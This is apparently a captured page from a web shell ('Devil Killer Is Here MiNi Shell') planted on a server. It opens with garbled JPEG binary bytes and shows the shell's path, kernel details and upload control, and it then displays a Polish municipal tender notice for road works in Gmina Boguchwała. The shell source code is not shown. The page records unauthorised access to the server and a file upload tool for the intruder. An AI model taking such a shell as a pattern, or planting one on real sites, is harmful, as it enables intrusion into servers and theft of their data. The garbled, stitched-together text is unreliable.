JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230127/0006219501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa i modernizacja dróg gminnych - etap I </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Boguchwała</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690582000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Suszyckich 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Boguchwała</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-040</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">m.kotula@um.boguchwala.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.boguchwala.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa i modernizacja dróg gminnych - etap I </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-729a5883-9ca8-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00062195</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00052857/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa i modernizacja dróg gminnych etap I</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-729a5883-9ca8-11ed-b4ea-f64d350121d2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielnie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu:<br/>- Platformy e-Zamówienia: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu &#34;Wykonawca&#34; na Platformie e-Zamówienia.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu muszą być zgodne z wymaganiami określonymi w rozporządzeniu<br/>Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert udziału w postępowaniu, odbywa się drogą elektroniczną za<br/>pośrednictwem formularzy do komunikacji dostępnych w zakładce &#34;Formularze&#34; (&#34;Formularze do komunikacji&#34;).<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem &#34;Formularzy do komunikacji&#34; wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza). Wykonawca przygotowuje ofertę przy pomocy interaktywnego<br/>&#34;Formularza ofertowego&#34; udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie<br/>postępowania w zakładce &#34;Informacje podstawowe&#34;.<br/>UWAGA! Nie należy zmieniać nazwy pliku nadanej przez Platformę e-Zamówienia. Zapisany &#34;Formularz ofertowy&#34; należy zawsze<br/>otwierać w programie Adobe Acrobat Reader DC.<br/>Wykonawca składa ofertę za pośrednictwem zakładki &#34;Oferty/wnioski&#34;, widocznej w podglądzie postępowania po zalogowaniu się na<br/>konto Wykonawcy. Po wybraniu przycisku &#34;Złóż ofertę&#34; system prezentuje okno składania ofert umożliwiające przekazanie<br/>dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop (&#34;przeciągnij&#34; i &#34;upuść&#34; służące do dodawania plików.<br/>Wykonawca dodaje wybrany z dysku i uprzednio podpisany &#34;Formularz oferty&#34; w pierwszym polu (&#34;Wypełniony formularz oferty&#34;. W<br/>kolejnym polu (&#34;Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę&#34;) Wykonawca dodaje pozostałe pliki<br/>stanowiące ofertę lub składane wraz z ofertą.<br/>Jeżeli wraz z ofertą składane są dokumenty zawierające tajemnicę przedsiębiorstwa Wykonawca, w celu utrzymania w poufności<br/>tych informacji, przekazuje je w wydzielonym i odpowiednio opisanym pliku wraz z zaznaczeniem w nazwie &#34;Dokument stanowiący<br/>tajemnicę przedsiębiorstwa&#34;.<br/>System sprawdza czy złożone pliki są podpisane i automatycznie je szyfruje, jednocześnie informując o tym Wykonawcę.<br/>Potwierdzenie czasu przekazania i odbioru oferty znajduje się w Elektronicznym Potwierdzeniu Przesłania (EPP) i Elektronicznym<br/>Potwierdzeniu Odebrania (EPO). EPP i EPO dostępne są dla zalogowanego Wykonawcy w zakładce &#34;Oferty/Wnioski&#34;.<br/>Oferta może być złożona tylko do upływu terminu składania ofert.<br/>Wykonawca może przed upływem terminu składania ofert wycofać ofertę. Wykonawca wycofuje ofertę w zakładce &#34;Oferty/Wnioski&#34;<br/>używając przycisku &#34;Wycofaj ofertę&#34;.<br/>Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych przetwarzanych w ramach<br/>postępowania o udzielenie zamówienia publicznego w trybie podstawowym o numerze referencyjnym: RIZ.271.2.2023 przy ul.<br/>Suszyckich 33, 36-040 Boguchwała - reprezentowana przez Burmistrza Boguchwały –<br/>dalej Administrator lub<br/>Gmina.<br/>2. Jeśli ma Pani/Pan pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych osobowych w związku z udzieleniem lub<br/>wykonywaniem zamówienia publicznego, a także przysługujących Pani/Panu uprawnień, może się Pani/Pan skontaktować się z<br/>Inspektorem Ochrony Danych Osobowych w Gminie za pomocą adresu: iod@boguchwala.pl<br/>3. Pani/Pana dane osobowe przetwarzane są w celu wypełnienia obowiązków prawnych ciążących na Gminie w związku z<br/>udzieleniem zamówienia publicznego w wybranym przez Gminę trybie postępowania tj. na podstawie art. 6 ust. 1 lit. c RODO<br/>4. W związku z przetwarzaniem danych w celach o których mowa w pkt 3 odbiorcami Pani/Pana danych osobowych mogą być:<br/>4.1. osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu przepisy ustawy z dnia 27 sierpnia<br/>2009 r. o finansach publicznych [Dz.U. z 2019 roku, poz. 869 z późn. zm.]oraz ustawy z dnia 11 września 2019 roku – Prawo<br/>Zamówień Publicznych [Dz.U. z 2019 roku, poz. 2019 z późn. zm.] – dalej PZP.<br/>4.2. inne podmioty, które na podstawie stosownych umów podpisanych z Gminą Boguchwała przetwarzają dane osobowe dla<br/>których Administratorem jest Gmina Boguchwała.<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy, a po tym czasie przez okres w zakresie wymaganym przez przepisy powszechnie obowiązującego prawa, tj.<br/>przepisy ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach oraz aktach wykonawczych do tej ustawy.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy PZP, związanym<br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>PZP;<br/>7. W przypadku wystąpienia okoliczności o których mowa w art. 4 ustawy PZP tj. przeprowadzenia postępowania o zamówienie<br/>publiczne z wyłączeniem stosowania wymogów określonych w ustawie PZP, nie podanie przez Panią/ Pana danych osobowych<br/>wyłącza możliwość wzięcia udziału w tym postępowaniu oraz zawarcia umowy.<br/>8. W związku z przetwarzaniem Pani/Pana danych osobowych przysługują Pani/Panu następujące uprawnienia:<br/>8.1. prawo dostępu do danych osobowych, w tym prawo do uzyskania kopii tych danych;<br/>8.2. prawo do żądania sprostowania (poprawiania) danych osobowych – w przypadku gdy dane są nieprawidłowe lub niekompletne;<br/>8.3. prawo do żądania ograniczenia przetwarzania danych osobowych – w przypadku, gdy:<br/>8.3.1. osoba, której dane dotyczą kwestionuje prawidłowość danych osobowych,<br/>8.3.2. przetwarzanie danych jest niezgodne z prawem, a osoba, której dane dotyczą, sprzeciwia się usunięciu danych, żądając w<br/>zamian ich ograniczenia,<br/>8.3.3. Administrator nie potrzebuje już danych dla swoich celów, ale osoba, której dane dotyczą, potrzebuje ich do ustalenia, obrony<br/>lub dochodzenia roszczeń,<br/>8.3.4. osoba, której dane dotyczą, wniosła sprzeciw wobec przetwarzania danych, do czasu ustalenia czy prawnie uzasadnione<br/>podstawy po stronie administratora są nadrzędne wobec podstawy sprzeciwu;<br/>8.3.5. przetwarzanie odbywa się w sposób zautomatyzowany.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz punkt wyżej</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIZ.271.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1. Zadaniami zostanie objęta przebudowa lub remont 13 odcinków dróg na terenie Gminy Bo-guchwała:<br/>3.1.1. Boguchwała, remont 66,00 m ul. Akacjowej w Boguchwale.<br/> Remontem zostanie objęty 66 m odcinek ul. Akacjowej w technologii:<br/>-czyszczenie i skropienie nawierzchni<br/>-nawierzchnia asfaltowa warstwa wiążąca 3 cm i ścieralna 3,0 cm<br/><br/>Docelowa szer. jezdni 3,0m<br/><br/> 3.1.2. Boguchwała, przebudowa ul. Pelca<br/><br/>Przebudową zostanie objęty 330 m odcinek ul. Pelca w Boguchwale w technologii:<br/>-korytowanie z wywozem urobku<br/>-podbudowa warstwa dolna z gruntu stabilizowanego cementem 15 cm<br/>-podbudowa warstwa górna z kruszyw łamanych 10-15 cm<br/>-nawierzchnia asfaltowa 4cm +3 cm<br/>-pobocza z kruszyw łamanych<br/>-zjazdy z kruszyw łamanych i asfaltu<br/><br/>Docelowa szer. nawierzchni bitumicznej 3,0 m<br/><br/> 3.1.3. Lutoryż, remont drogi na dz. 1707 k. szkoły<br/><br/>Remontem zostanie objęty 210 m odcinek drogi w technologii:<br/>-frezowanie<br/>-czyszczenie i skropienia nawierzchni<br/>-warstwa wyrównawcza bitumiczna śr. 2,0 cm<br/>-nawierzchnia asfaltowa warstwa ścieralna 4 cm<br/>-regulacja wpustów ulicznych<br/>-pobocza i zjazdy<br/><br/>Docelowa szer. jezdni śr. 5,0m <br/><br/><br/> 3.1.4. Boguchwała , remont ul. Kwiatowej<br/><br/>Remontem zostanie objęty odcinek ul. Kwiatowej o pow. 1258,50 m2 w technologii:<br/>-frezowanie<br/>-czyszczenie i skropienie nawierzchni<br/>-warstwa wyrównawcza bitumiczna śr. 2,0 cm<br/>-nawierzchnia asfaltowa warstwa ścieralna 4,0 cm<br/>-regulacja włazów studni 4 szt.<br/>-studnia wpustowa 500mm z 5,0 m przykanalikiem<br/><br/>Docelowa szer. jezdni 3,5 - 6,50m<br/><br/> 3.1.5. Niechobrz , przebudowa 200m drogi na dz. 973/10 .<br/><br/>Przebudową zostanie objęty 200 odcinek drogi w technologii:<br/>- profilowanie podłoża<br/>-podbudowa warstwa dolna z kruszyw łamanych 10 cm i górna z kruszyw łamanych <br/>5 cm<br/>-nawierzchnia asfaltowa 3cm + 4,0 cm<br/>-pobocza i zjazdy z kruszyw łamanych<br/><br/>Docelowa szer. nawierzchni bitumicznej 3,0 m<br/><br/>3.1.6.	Niechobrz, przebudowa 20,00 m drogi na dz. 2138 k. młyna w technologii:<br/><br/>-roboty pomiarowe<br/>-korytowanie z wypełnieniem koryta 25 cm warstwą podbudowy z kruszyw łamanych<br/>- profilowanie podłoża<br/>-podbudowa warstwa dolna i górna z kruszyw łamanych 12 cm + 5 cm<br/>-nawierzchnia asfaltowa 3cm + 4cm<br/>-pobocza z kruszyw łamanych <br/>-plantowanie terenu przyległego do pobocza w tym profilowanie rowów<br/><br/>Docelowa szer. nawierzchni bitumicznej 3,0 m<br/><br/>3.1.7.	Niechobrz, przebudowa 70 m drogi na kamieniołom w technologii:<br/><br/>- mechaniczne profilowanie podłoża<br/>-podbudowa warstwa górna z kruszyw łamanych 10 cm<br/>-nawierzchnia asfaltowa 3cm + 4cm<br/>-pobocza z kruszyw łąmanych<br/>-plantowanie terenu przyległego do pobocza w tym profilowanie rowów<br/><br/>Docelowa szer. nawierzchni bitumicznej 3,0 m<br/> <br/>3.1.8. Racławówka , przebudowa 155m drogi na stadninę w technologii:<br/> <br/>- mechaniczne profilowanie podłoża<br/>-podbudowa warstwa dolna i górna z kruszyw łamanych 10 cm + 5 cm<br/>-nawierzchnia asfaltowa 3 cm + 4 cm<br/>-pobocza z kruszyw łamanych<br/>-plantowanie terenu przyległego do pobocza w tym profilowanie rowów<br/><br/>Docelowa szer. nawierzchni bitumicznej 3,0 m<br/><br/>3.1.9. Wola Zgłobieńska, przebudowa 140m odcinka drogi w technologii:<br/><br/>- profilowanie podłoża<br/>-podbudowa warstwa dolna i górna z kruszyw łamanych 10 cm + 5 cm<br/>-nawierzchnia asfaltowa 3 cm + 4 cm<br/>-pobocza z kruszyw łamanych<br/>-plantowanie terenu przyległego do pobocza <br/><br/>Docelowa szer. nawierzchni bitumicznej 3,0 m<br/><br/>3.1.10	Wola Zgłobieńska , remont 156m odcinka w technologii :<br/><br/>-mechaniczne czyszczenie nawierzchni<br/>-skropienie nawierzchni asfaltem<br/>-nawierzchnia asfaltowa warstwa profilowa śr. 2,0 cm<br/>-nawierzchnia asfaltowa warstwa ścieralna 4,0 cm<br/>-pobocza i zjazdy z kruszyw łamanych<br/><br/>Docelowa szer. nawierzchni bitumicznej 4,0 m<br/><br/>3.1.11 Niechobrz, przebudową 100 m odcinek drogi + 35 m2 na dz. 1515 w technologii:<br/><br/>-korytowanie 20m2 z wypełnieniem kruszywem łamanym 20 cm<br/>-mechaniczne profilowanie podłoża<br/>-podbudowa warstwa górna z kruszyw łamanych 8-10 cm<br/>-nawierzchnia asfaltowa 3 cm + 4 cm<br/>-pobocza z kruszyw łamanych<br/><br/>Docelowa szer. nawierzchni bitumicznej 4,0m - 3,0m<br/><br/>3.1.12 Wola Zgłobieńska , 3 mijanki w technologii: <br/>a. mijanka 1 przy drodze na dz. 414 24 m2<br/> - roboty pomiarowe<br/> - kolektor fi 400 z rur PP SN8 12 m<br/> - ścianka czołowa kolektora 400 mm z oporem<br/> - korytowanie 30 cm z wypełnieniem kruszywem łamanym warstwa dolna 25 cm i górna<br/> (nawierzchnia) 5 cm<br/> - zakup i montaż barierki U12a czerwono - białej<br/>b. mijanka 2 przy drodze na dz. 873 36 m2<br/> - roboty pomiarowe<br/> - rozbiórka 6,0 m przepustu betonowego fi 400 mm<br/> - kolektor fi 300 z rur PP SN8 18 m<br/> - 2 ścianka czołowe kolektora 300 mm z oporem<br/> - korytowanie 30 cm z wypełnieniem kruszywem łamanym warstwa dolna 25 cm i górna<br/> (nawierzchnia) 5 cm<br/>c. mijanka 3 przy drodze na dz. 873 36 m2 <br/> - roboty pomiarowe <br/> - korytowanie 30 cm z wypełnieniem kruszywem łamanym warstwa dolna 25 cm i górna<br/> (nawierzchnia) 5 cm<br/><br/>3.1.13 Lutoryż, przebudowa drogi na dz. 1696 i sąsiednich w technologii:<br/> <br/> - roboty pomiarowe<br/> - wycinka z pocięciem na kawałki 19 szt. drzew 26-35 cm<br/> - karczowanie 19 pni<br/> - usunięcie humusu<br/> - przedłużenie o 2,0 m przepustu śr. 400 mm<br/> - formowanie 540 m3 nasypów z dowozem<br/> - wykonanie koryta na poszerzeniach jezdni z wypełnieniem warstwą mrozoochronną, <br/> zasadniczą z kruszywa łamanego i nawierzchnią AC11S gr. 6 cm , pow. 66m2.<br/> - studzienki ściekowe 6 szt. z przykanalikami śr. wewn. 200mm o łącznej dł. 24 m.<br/> - mechaniczne profilowanie podłoża 492m2<br/> - ulepszone podłoże z gruntu stabilizowanego z gruntu stabilizowanego spoiwem<br/> hydraulicznym CO 4/o,5 gr. 15 cm 492 m2.<br/> - podbudowa zasadnicza z kruszywa łamanego 15 cm, 492 m2<br/> - nawierzchnia z kostki brukowej 6,00 cm 492 m2<br/> - krawężnik betonowy wystający z oporem 15x30 306 m<br/> - obrzeże betonowe 30x8 z ławą betonową z oporem 306 m<br/> - wykonywanie rowów na odkład 170 m3<br/> - przepusty rurowe pod zjazdami śr. 400mm z PP 33m<br/> - humusowanie skarp z obsianiem gr. warstwy 5 cm 240m2<br/> - wykonanie zjazdów za chodnikiem z kruszywa łamanego 10 cm , 60m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233262-3 - Roboty budowlane w zakresie stref ruchu pieszego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233123-7 - Roboty budowlane w zakresie dróg podrzędnych</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający PRZEWIDUJE udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp do wysokości 400 000 zł netto. <br/>11.1.	Określenie przedmiotu Zamówienia:<br/><br/>Zamawiający przewiduje udzielenie zamówień podobnych polegających na powtórzeniu tego samego rodzaju zamówienia w zakresie robót wymienionych w przedmiarach robót. <br/><br/>11.2.	Zamówienia te będą dotyczyć przedmiotu zamówienia i polegać będą na powtórzeniu podobnych robót budowanych, zgodnych z przedmiotem zamówienia podstawowego w szczególności:<br/>1)	Roboty przygotowawcze: roboty pomiarowe, rozbiórkowe<br/>2)	roboty ziemne, podbudowy, nawierzchnie drogowe <br/>3)	roboty wykończeniowe. <br/>11.3.	Warunki, na jakich zostanie udzielone zamówienie, o którym mowa w art. 214 ust. 1 pkt 7 ustawy PZP:<br/>Warunkiem udzielenia zamówienia będzie zarezerwowanie środków na ten cel w bu-dżecie Gminy Boguchwała. Udzielenie zamówienia zostanie poprzedzone przepro-wadzeniem negocjacji, których przedmiotem będzie cena oraz warunki realizacji za-mówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 